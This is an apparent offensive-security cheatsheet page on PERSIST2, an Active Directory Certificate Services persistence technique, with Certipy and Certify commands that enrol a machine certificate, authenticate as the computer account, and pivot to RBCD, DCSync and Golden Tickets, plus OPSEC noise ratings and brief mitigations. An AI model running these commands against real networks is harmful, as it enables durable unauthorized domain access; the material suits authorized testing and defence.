daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

persist2-machine-account-persistence-via-certificates.md (3552B)


      1 ---
      2 title: "PERSIST2 — Machine Account Persistence via Certificates"
      3 description: "Machine accounts rotate their password automatically every ~30 days, which normally limits how long a stolen machine hash stays useful. A certificate…"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "kerberos", "adcs", "credential-access", "persistence"]
      7 tools: ["Certipy", "Certify", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/PERSIST2 — Machine Account Persistence via Certificates.md"
     11 ---
     12 # PERSIST2 — Machine Account Persistence via Certificates
     13 
     14 ## Quick Reference
     15 
     16 | Field | Value |
     17 |-------|-------|
     18 | **Category** | Account Persistence (machine) |
     19 | **Difficulty** | Low–Medium |
     20 | **Pre-requisites** | SYSTEM/admin on a host (or control of a machine account) + a machine-enrolment template |
     21 | **Tools** | Certipy, Certify |
     22 | **OPSEC Noise** | Low — a normal machine enrolment |
     23 | **One-liner** | Enrol an authentication certificate for a **computer account** and keep it — it outlives the 30-day machine-password rotation, giving durable access as `HOST$`. |
     24 
     25 ***
     26 
     27 ## What Is PERSIST2?
     28 
     29 Machine accounts rotate their password automatically every ~30 days, which normally limits how long a stolen machine hash stays useful. A **certificate** side-steps that: enrol a cert for the computer account and it stays valid for the template's full lifetime (often 1 year), regardless of password rotation. Since computer accounts are frequent RBCD/Kerberoast targets — and a DC's account is a DCSync-capable identity — this is potent persistence.
     30 
     31 ***
     32 
     33 ## Step 1 — Enrol a Machine Certificate
     34 
     35 ```bash
     36 # As SYSTEM on the host (or with the machine account's hash), request a Machine cert
     37 certipy-ad req \
     38   -u 'HOST$@domain.htb' -hashes :<MACHINE_NTHASH> \
     39   -dc-ip $TARGET -ca 'DOMAIN-CA' -template 'Machine'
     40 #   -> host.pfx  (survives the 30-day rotation)
     41 ```
     42 
     43 ```powershell
     44 # From SYSTEM on the box, the machine context can enrol directly
     45 .\Certify.exe request /ca:DC01\DOMAIN-CA /template:Machine /machine
     46 ```
     47 
     48 ***
     49 
     50 ## Step 2 — Authenticate as the Machine Later
     51 
     52 ```bash
     53 certipy-ad auth -pfx host.pfx -dc-ip $TARGET
     54 #   -> HOST$ TGT + machine NT hash (even after password rotation)
     55 ```
     56 
     57 ***
     58 
     59 ## Step 3 — Leverage the Machine Identity
     60 
     61 - **RBCD:** if `HOST$` can be configured for delegation, impersonate any user to services on it.
     62 - **DC machine account:** a `DC01$` cert authenticates as the DC → DCSync `krbtgt` → Golden Ticket.
     63 - **Re-loot:** each PKINIT auth returns the machine's *current* NT hash, self-healing after rotation.
     64 
     65 > [!warning] DC machine persistence = domain persistence
     66 > A certificate for a Domain Controller's computer account is effectively domain-level persistence. Consider it alongside DPERSIST1.
     67 
     68 ***
     69 
     70 ## OPSEC Considerations
     71 
     72 | Action | Log | Noise |
     73 | :-- | :-- | :-- |
     74 | Machine cert request | Event 4886/4887 on CA | 🟢 Low |
     75 | PKINIT as HOST$ | Event 4768 on DC | 🟢 Low |
     76 
     77 ***
     78 
     79 ## Mitigation
     80 
     81 - Revoke machine certificates when a host is reimaged or suspected compromised.
     82 - Constrain which templates permit machine enrolment; audit certs issued to computer accounts.
     83 - Tier DCs; treat DC machine-cert issuance as high severity.
     84 
     85 ***
     86 
     87 ## See Also
     88 
     89 - _ADCS Attack Methodology Guide · THEFT3 — Machine Certificate Theft via DPAPI · PERSIST1 — Active User Credential Theft via Certificates
     90 - Sources: SpecterOps *Certified Pre-Owned*; [Certipy Wiki](https://github.com/ly4k/Certipy/wiki)